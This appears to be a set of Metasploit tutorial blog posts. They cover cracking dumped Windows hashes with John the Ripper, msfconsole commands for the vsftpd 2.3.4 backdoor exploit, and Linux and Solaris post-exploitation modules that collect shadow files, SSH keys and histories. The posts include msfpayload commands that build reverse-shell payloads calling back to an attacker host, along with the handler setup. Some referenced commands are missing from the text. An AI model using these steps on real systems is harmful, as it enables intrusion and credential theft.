Metasploit team has release a John the Ripper password cracker integration into Metasploit. Now it is directly possible to crack weak passwords gathered in hashes files, or LANMAN/NTLM, hashdump in msfconsole.
JtR is integrated as an “analyze” auxiliary module, called “jtr_crack_fast ” and can be used by typing this command :
In order to use you this auxiliary module you first need to have Metasploit database support (postgres or mysql) and to be connected to this database. To create and/or connect you to a database, you only need to type theses commands :
If you don’t have an existing database, “db_connect” will create the database for you. Also you can use “db_status” command to verify your connexion.
Once you have exploit a Windows box and got a session with SYSTEM privileges, you can gather all LANMAN/NTLM hasdumps with the “hashdump” post exploitation module.
All gathered hasdumps are stored into the “creds” table of the database.
Now, that you have hashdumps in the database you try to crack weak passwords with the integrated Metasploit John the Ripper.
If password are cracked successfully, these cracked passwords are then also stored in the “creds” table of the database.
Metasploit build in JtR include standard wordlist and rules, but you can also provide to the module the directory path how is containing JtR (JOHN_BASE), and also the absolute path to the JtR executable (JOHN_PATH).
“john.conf” file is located by default in “/opt/metasploit3/msf3/data/john/confs/john.conf” and the wordlist into “/opt/metasploit3/msf3/data/john/wordlists/password.lst“.
This module exploits a malicious backdoor that was added to the vsftpd download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.
Commands :
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
A new set of post exploitation scripts have been developed and integrated in the Metasploit framework repository. These scripts permit you to gather interesting information’s on a Solaris target. These Metasploit post exploitation scripts are supporting all Solaris versions. For the moment are only working with a “shell” session but Metasploit team is working on a version how is supporting a complete integration with meterpreter.
Solaris enum_packages post exploitation script
This module will focus on installed softwares. Execution of “/usr/bin/pkginfo -l” and export off all results in “$HOME/.msf3/loot/” folder.
Solaris enum_services post exploitation script
This module will focus on installed services. Execution of “/usr/bin/svcs -a” and export off all results in “$HOME/.msf3/loot/” folder.
Solaris hashdump post exploitation script
This module will gather “/etc/password” and “/etc/shadow” files and export off all results in “$HOME/.msf3/loot/” folder.
Solaris checkvm post exploitation script
This module will attempt to determine wether the targeted system is running inside of a virtual environment and will provide you the type of virtualization technology how is used. This module supports detection of Hyper-V, VMWare, VirtualBox, Xen, and QEMU/KVM.
To test these scripts you only need to create an executable payload for Solaris and follow these steps.
First create the payload with msfpayload and upload it to the targeted Solaris.
sudo msfpayload cmd/unix/reverse_perl LHOST= LPORT=4444 X > payload
Then in msfconsole, run the following commands.
use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_perl
exploit -j
After on the targeted Solaris, execute the payload script.
A new set of post exploitation scripts have been developed and integrated in the Metasploit framework repository. These scripts permit you to gather interesting information’s on a Linux target.
These Metasploit post exploitation scripts are normally supporting all Linux distributions. For the moment are only working with a “shell” session but Metasploit team is working on a version how is supporting a complete integration with meterpreter.
Linux enum_linux post exploitation script
This script will permit you to gather different datas from the target :
Hostname of the target.
Current running system user.
Linux distribution and version.
Complete running kernel version
Complete system users from “/etc/password”
Network configuration from “/sbin/ifconfig -a” command.
The routing configuration from “/sbin/route” command
All mounted drives list from the “/bin/mount -l” command.
Complete “iptables -L” command output. The “nat” and “mangle” tables are also gather with the “iptables -L -t nat” and “iptables -L -t mangle” commands.
DNS configuration from “/etc/resolv.conf“
SSH server configuration from “/etc/ssh/sshd_config“
Statics hosts entries from “/etc/hosts“
Complete output of “/etc/password” file
Possible ssh keys located in “.ssh” folders on the entire system.
Installed softwares. Execution of “rpm -qa” for Fedora, Red Hat, SuSe, Mandrake and Oracle. Execution of “ls /var/log/packages” for Slackware. Execution of “dpkg -l” for Ubuntu and Debian. Execution of “equery list” for Gentoo. Execution of “/usr/bin/pacman -Q” for ArcLinux.
Installed services. Execution of “chkconfig –list” for Fedora, Red Hat, SuSe, Mandrake and Oracle. Some logfu commands for Mandrake. Execution of “/usr/bin/service –status-all” for Ubuntu and Debian. Execution of “/bin/rc-status –all” for Gentoo.
Possible “.bash_history” files located in each users home folder.
Also the module will try to do a screenshot of display “0:0” with the xwd command.
All these datas are transfered on your Metasploit box for further analysis. All gathered information’s are saved into a “loot/date” folder located into your “$HOME/.msf3” folder.
Linux enum_packages post exploitation script
This module is a sub module how will only focus on installed softwares. Execution of “rpm -qa” for Fedora, Red Hat, SuSe, Mandrake and Oracle. Execution of “ls /var/log/packages” for Slackware. Execution of “dpkg -l” for Ubuntu and Debian. Execution of “equery list” for Gentoo. Execution of “/usr/bin/pacman -Q” for ArcLinux
Linux enum_services post exploitation script
This module is a sub module how will only focus on installed services. Execution of “chkconfig –list” for Fedora, Red Hat, SuSe , Mandrake and Oracle. Some logfu commands for Mandrake. Execution of “/usr/bin/service –status-all” for Ubuntu and Debian. Execution of “/bin/rc-status –all” for Gentoo.
Linux hashdump post exploitation script
This module will gather “/etc/password” and “/etc/shadow” files.
Linux enum_cron post exploitation script
This module will enumerate cron jobs for all users on the system by executing the command “crontab -u #{user} -l” where “#{user}” is the user enumerated from “/etc/passwd” file.
Linux checkvm post exploitation script
This module will attempt to determine wether the targeted system is running inside of a virtual environment and will provide you the type of virtualization technology how is used. This module supports detection of Hyper-V, VMWare, VirtualBox, Xen, and QEMU/KVM. All informations are gathered by looking for virtualization informations with “/sbin/lsmod“, “dmesg” and “cat /proc/scsi/scsi” commands.
To test these scripts you only need to create an executable payload for Linux and follow these steps.
First create the payload with msfpayload and upload it to the targeted Linux.
sudo msfpayload linux/x86/shell_reverse_tcp LHOST= LPORT=4444 X > test
Then in msfconsole, run the following commands.
use exploit/multi/handler
set PAYLOAD linux/x86/shell_reverse_tcp
exploit -j
After on the targeted Linux, execute the test payload